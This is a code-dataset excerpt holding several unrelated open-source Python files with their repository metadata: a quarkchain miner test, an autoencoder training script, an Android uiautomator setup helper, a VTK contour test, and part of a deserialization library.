hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
132f2f1fcc81be862b19147ccbf0e1ac78045127
| 8,995
|
py
|
Python
|
quarkchain/cluster/tests/test_miner.py
|
TahiG/pyquarkchain
|
30da626ef6b50bd07b230aac05a3cef7fd7f23cf
|
[
"MIT"
] | 17
|
2018-12-25T03:41:25.000Z
|
2020-08-11T06:06:26.000Z
|
quarkchain/cluster/tests/test_miner.py
|
TahiG/pyquarkchain
|
30da626ef6b50bd07b230aac05a3cef7fd7f23cf
|
[
"MIT"
] | null | null | null |
quarkchain/cluster/tests/test_miner.py
|
TahiG/pyquarkchain
|
30da626ef6b50bd07b230aac05a3cef7fd7f23cf
|
[
"MIT"
] | 5
|
2018-12-25T07:55:56.000Z
|
2019-09-11T23:19:59.000Z
|
import asyncio
import time
import unittest
from typing import Optional
from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal
from quarkchain.config import ConsensusType
from quarkchain.core import RootBlock, RootBlockHeader
from quarkchain.p2p import ecies
from quarkchain.utils import sha3_256
class TestMiner(unittest.TestCase):
def setUp(self):
super().setUp()
def miner_gen(consensus, create_func, add_func, **kwargs):
m = Miner(
consensus, create_func, add_func, self.get_mining_params, **kwargs
)
m.enabled = True
return m
self.miner_gen = miner_gen
self.added_blocks = []
@staticmethod
def get_mining_params(rounds: Optional[int] = None):
# guarantee target time is hit
ret = {"target_block_time": 0.0, "is_test": True}
if rounds is not None:
ret["rounds"] = rounds
return ret
def test_mine_new_block_normal_case(self):
async def create(retry=True):
if len(self.added_blocks) >= 5:
return None # stop the game
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal miner
self.added_blocks.append(block)
for consensus in (
ConsensusType.POW_SIMULATE,
ConsensusType.POW_ETHASH,
ConsensusType.POW_SHA3SHA3,
):
miner = self.miner_gen(consensus, create, add)
# should generate 5 blocks and then end
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 5)
def test_simulate_mine_handle_block_exception(self):
i = 0
async def create(retry=True):
nonlocal i
if i >= 5:
return None
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal i, miner
try:
if i % 2 == 0:
raise Exception("(╯°□°)╯︵ ┻━┻")
else:
self.added_blocks.append(block)
finally:
i += 1
miner = self.miner_gen(ConsensusType.POW_SIMULATE, create, add)
# only 2 blocks can be added
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 2)
def test_sha3sha3(self):
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_SHA3SHA3},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
def test_qkchash(self):
miner = self.miner_gen(ConsensusType.POW_QKCHASH, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_QKCHASH},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
block.header.mixhash = mined_res.mixhash
validate_seal(block.header, ConsensusType.POW_QKCHASH)
def test_only_remote(self):
async def go():
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
with self.assertRaises(ValueError):
await miner.get_work()
with self.assertRaises(ValueError):
await miner.submit_work(b"", 42, b"")
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_get_work(self):
now = 42
async def create(retry=True):
nonlocal now
return RootBlock(RootBlockHeader(create_time=now, extra_data=b"{}"))
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, None, remote=True)
async def go():
nonlocal now
# no current work, will generate a new one
work = await miner.get_work(now=now)
self.assertEqual(len(work), 3)
self.assertEqual(len(miner.work_map), 1)
h = list(miner.work_map.keys())[0]
self.assertEqual(work.hash, h)
# cache hit
now += 1
work = await miner.get_work(now=now)
self.assertEqual(work.hash, h)
self.assertEqual(len(miner.work_map), 1)
# new work if interval passed
now += 10
work = await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 2)
self.assertNotEqual(work.hash, h)
# work map cleaned up if too much time passed
now += 100
await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 1) # only new work itself
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=5)
)
async def create(retry=True):
return block
async def add(block_to_add):
self.added_blocks.append(block_to_add)
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, add, remote=True)
async def go():
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
self.assertEqual(work.difficulty, 5)
# submitted block doesn't exist
res = await miner.submit_work(b"lolwut", 0, sha3_256(b""))
self.assertFalse(res)
solver = DoubleSHA256(work)
sol = solver.mine(100, 200).nonce
self.assertGreater(sol, 100) # ensure non-solution is tried
non_sol = sol - 1
# invalid pow proof
res = await miner.submit_work(work.hash, non_sol, sha3_256(b""))
self.assertFalse(res)
# valid submission, also check internal state afterwards
res = await miner.submit_work(work.hash, sol, sha3_256(b""))
self.assertTrue(res)
self.assertEqual(miner.work_map, {})
self.assertEqual(len(self.added_blocks), 1)
self.assertIsNone(miner.current_work)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work_with_guardian(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=1000)
)
async def create(retry=True):
return block
async def add(_):
pass
miner = self.miner_gen(
ConsensusType.POW_SHA3SHA3,
create,
add,
remote=True,
# fake pk, will succeed in test but fail in real world when
# adding the block to the root chain
guardian_private_key=ecies.generate_privkey(),
)
async def go():
for i in range(42, 100):
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
# guardian: diff 1000 -> 1, any number should work
res = await miner.submit_work(work.hash, i, sha3_256(b""))
self.assertTrue(res)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_validate_seal_with_adjusted_diff(self):
diff = 1000
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=diff),
tracking_data="{}".encode("utf-8"),
)
block.header.nonce = 0
with self.assertRaises(ValueError):
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
# significantly lowering the diff should pass
validate_seal(block.header, ConsensusType.POW_SHA3SHA3, adjusted_diff=1)
| 35
| 90
| 0.585103
| 1,053
| 8,995
| 4.831909
| 0.202279
| 0.050314
| 0.04717
| 0.053459
| 0.617728
| 0.551887
| 0.483294
| 0.40684
| 0.397602
| 0.379914
| 0
| 0.02285
| 0.318844
| 8,995
| 256
| 91
| 35.136719
| 0.806104
| 0.081267
| 0
| 0.450495
| 0
| 0
| 0.014192
| 0
| 0
| 0
| 0
| 0
| 0.118812
| 1
| 0.059406
| false
| 0.004951
| 0.044554
| 0
| 0.153465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133006e28697a9c060805e03e6080858eb027007
| 4,782
|
py
|
Python
|
analysis/networks/autoencoder/train_eval.py
|
nriesterer/iccm-neural-bound
|
e14b103ba2c81a197de5b0edf948c19d57f0d3ba
|
[
"MIT"
] | null | null | null |
analysis/networks/autoencoder/train_eval.py
|
nriesterer/iccm-neural-bound
|
e14b103ba2c81a197de5b0edf948c19d57f0d3ba
|
[
"MIT"
] | null | null | null |
analysis/networks/autoencoder/train_eval.py
|
nriesterer/iccm-neural-bound
|
e14b103ba2c81a197de5b0edf948c19d57f0d3ba
|
[
"MIT"
] | null | null | null |
""" Evaluates the training performance of the autoencoder.
"""
import time
import pandas as pd
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import ccobra
import onehot
import autoencoder
# General settings
training_datafile = '../../data/Ragni-train.csv'
test_datafile = '../../data/Ragni-test.csv'
n_epochs = 150
batch_size = 16
net = autoencoder.DenoisingAutoencoder()
criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
def csv_to_tensor(datafile):
profiles = []
response_dicts = []
task_sequences = []
df = pd.read_csv(datafile)
for _, subj_df in df.groupby('id'):
# Obtain the task-response mapping for all syllogisms
response_dict = {}
task_sequence = []
for _, task_series in subj_df.sort_values('sequence').iterrows():
item = ccobra.Item(
task_series['id'], task_series['domain'], task_series['task'],
task_series['response_type'], task_series['choices'], task_series['sequence'])
syllogism = ccobra.syllogistic.Syllogism(item)
response_dict[syllogism.encoded_task] = syllogism.encode_response(
task_series['response'].split(';'))
task_sequence.append(syllogism.encoded_task)
# Convert the task-response mapping to the reasoner profile
profile = []
for task in ccobra.syllogistic.SYLLOGISMS:
profile.append(onehot.onehot_response(response_dict[task]))
profiles.append(profile)
response_dicts.append(response_dict)
task_sequences.append(task_sequence)
profile_tensor = torch.tensor(profiles).float().view(-1, 576)
return profile_tensor, np.array(response_dicts), np.array(task_sequences)
# Construct the training and test tensors
train_data, train_resp_dicts, train_seqs = csv_to_tensor(training_datafile)
test_data, test_resp_dicts, test_seqs = csv_to_tensor(test_datafile)
def compute_accuracy(data, resp_dicts, seqs):
accs = []
for subj_idx in range(len(data)):
subj_resp_dict = resp_dicts[subj_idx]
subj_seq = seqs[subj_idx]
profile_tensor = torch.zeros((576)).float()
subj_hits = []
for task in subj_seq:
task_idx = ccobra.syllogistic.SYLLOGISMS.index(task)
start = task_idx * 9
end = start + 9
truth = subj_resp_dict[task]
# Query the network for a prediction
prediction_idx = net(profile_tensor)[start:end].argmax()
prediction = ccobra.syllogistic.RESPONSES[prediction_idx]
subj_hits.append(prediction == truth)
# Add the true response to the profile
profile_tensor[start:end] = torch.from_numpy(onehot.onehot_response(truth))
accs.append(subj_hits)
return accs
# Training loop
train_accs = []
test_accs = []
losses = []
for epoch in range(n_epochs):
start_time = time.time()
# Permute the training data
rnd_idxs = np.random.permutation(np.arange(len(train_data)))
train_data = train_data[rnd_idxs]
train_resp_dicts = train_resp_dicts[rnd_idxs]
train_seqs = train_seqs[rnd_idxs]
batch_losses = []
for batch_idx in range(len(train_data) // batch_size):
# Obtain the batch data
start = batch_idx * batch_size
end = start + batch_size
batch_data = train_data[start:end]
input_data = batch_data
# Augment the input data by adding noise
noise = torch.bernoulli(torch.zeros_like(input_data) + 0.8)
input_data = input_data * noise
# Perform the training
outputs = net(input_data)
loss = criterion(outputs, batch_data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_losses.append(loss.item())
losses.append(np.mean(batch_losses))
# Compute the accuracies for evaluation
net.eval()
# Compute the overall accuracy on the training dataset
train_acc = compute_accuracy(train_data, train_resp_dicts, train_seqs)
test_acc = compute_accuracy(test_data, test_resp_dicts, test_seqs)
# Diagnostig output
print('Epoch {}/{} ({:.2f}s): {}'.format(
epoch + 1, n_epochs, time.time() - start_time, np.mean(batch_losses)))
print(' train acc: {:.4f} ({:.4f})'.format(np.mean(train_acc), np.std(train_acc)))
print(' test acc : {:.4f} ({:.4f})'.format(np.mean(test_acc), np.std(test_acc)))
# Store the accuracy results
train_accs.append(train_acc)
test_accs.append(test_acc)
# Write the accuracies to disk
print('Writing the results to disk...')
np.save('train_accs.npy', np.array(train_accs))
np.save('test_accs.npy', np.array(test_accs))
np.save('train_losses.npy', np.array(losses))
| 32.310811
| 94
| 0.669385
| 623
| 4,782
| 4.908507
| 0.255217
| 0.026161
| 0.018313
| 0.01864
| 0.052322
| 0.052322
| 0.039895
| 0
| 0
| 0
| 0
| 0.005901
| 0.22041
| 4,782
| 147
| 95
| 32.530612
| 0.814378
| 0.121497
| 0
| 0
| 0
| 0
| 0.063682
| 0.01221
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020619
| false
| 0
| 0.092784
| 0
| 0.134021
| 0.041237
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13319b518cfc2b51d7dc1b3515004faa2aab4919
| 2,170
|
py
|
Python
|
Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py
|
Aver58/ColaFrameWork
|
04c6750305ad734b30eceb95b463695b8373845a
|
[
"MIT"
] | 1
|
2020-12-30T00:33:31.000Z
|
2020-12-30T00:33:31.000Z
|
Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py
|
wtb521thl/ColaFrameWork
|
0a8cc589740e045ebde668a76c4a35366b38e62e
|
[
"MIT"
] | null | null | null |
Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py
|
wtb521thl/ColaFrameWork
|
0a8cc589740e045ebde668a76c4a35366b38e62e
|
[
"MIT"
] | 1
|
2020-07-27T12:28:56.000Z
|
2020-07-27T12:28:56.000Z
|
#-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu wukenaihesos@gmail.com'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger=logging.getLogger("wetest")
_device_port=9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT","19008")
def _init_uiautomator():
"""
初始化uiautomator
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
本地,初始化UiAutomator
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
| 35
| 305
| 0.723502
| 283
| 2,170
| 5.402827
| 0.519435
| 0.064094
| 0.071942
| 0.031393
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013304
| 0.168664
| 2,170
| 61
| 306
| 35.57377
| 0.834257
| 0.323963
| 0
| 0.114286
| 0
| 0
| 0.189209
| 0.03813
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0
| 0.142857
| 0
| 0.342857
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1334b7e4ac98033a8f1ce868857f5028fcae2b7d
| 2,261
|
py
|
Python
|
IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py
|
timkrentz/SunTracker
|
9a189cc38f45e5fbc4e4c700d7295a871d022795
|
[
"MIT"
] | null | null | null |
IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py
|
timkrentz/SunTracker
|
9a189cc38f45e5fbc4e4c700d7295a871d022795
|
[
"MIT"
] | null | null | null |
IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py
|
timkrentz/SunTracker
|
9a189cc38f45e5fbc4e4c700d7295a871d022795
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestSynchronizedTemplates3D(Testing.vtkTest):
def testAll(self):
reader = vtk.vtkImageReader()
reader.SetDataByteOrderToLittleEndian()
reader.SetDataExtent(0,63,0,63,1,93)
reader.SetDataSpacing(3.2,3.2,1.5)
reader.SetFilePrefix("" + str(VTK_DATA_ROOT) + "/Data/headsq/quarter")
reader.SetDataMask(0x7fff)
# write isosurface to file
#vtkSynchronizedTemplates3D stemp
stemp = vtk.vtkContourFilter()
stemp.SetInputConnection(reader.GetOutputPort())
stemp.SetValue(0,1150)
stemp.GenerateTrianglesOff()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),38380)
stemp.GenerateTrianglesOn()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),78268)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(stemp.GetOutputPort())
mapper.ScalarVisibilityOff()
head = vtk.vtkActor()
head.SetMapper(mapper)
head.GetProperty().SetColor(1,0.7,0.6)
# Create the RenderWindow, Renderer and Interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(head)
ren1.SetBackground(1,1,1)
renWin.SetSize(400,400)
ren1.SetBackground(0.5,0.5,0.6)
ren1.GetActiveCamera().SetPosition(99.8847,537.926,15)
ren1.GetActiveCamera().SetFocalPoint(99.8847,109.81,15)
ren1.GetActiveCamera().SetViewAngle(20)
ren1.GetActiveCamera().SetViewUp(0,0,-1)
ren1.ResetCameraClippingRange()
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
if __name__ == "__main__":
Testing.main([(TestSynchronizedTemplates3D, 'test')])
| 35.888889
| 81
| 0.707651
| 244
| 2,261
| 6.508197
| 0.504098
| 0.047859
| 0.060453
| 0.108312
| 0.172544
| 0.172544
| 0.172544
| 0.172544
| 0.172544
| 0.172544
| 0
| 0.059517
| 0.175144
| 2,261
| 62
| 82
| 36.467742
| 0.791957
| 0.127377
| 0
| 0.086957
| 0
| 0
| 0.016842
| 0
| 0
| 0
| 0.003158
| 0
| 0
| 1
| 0.021739
| false
| 0
| 0.065217
| 0
| 0.108696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1335259eff2620253efdbb6cb8199b32e7ccadf8
| 14,913
|
py
|
Python
|
deserialize/__init__.py
|
iAndriy/deserialize
|
3552517873d68d3bb953b44dd9512f0e0d045191
|
[
"MIT"
] | null | null | null |
deserialize/__init__.py
|
iAndriy/deserialize
|
3552517873d68d3bb953b44dd9512f0e0d045191
|
[
"MIT"
] | null | null | null |
deserialize/__init__.py
|
iAndriy/deserialize
|
3552517873d68d3bb953b44dd9512f0e0d045191
|
[
"MIT"
] | null | null | null |
"""A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
:raises Exception: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
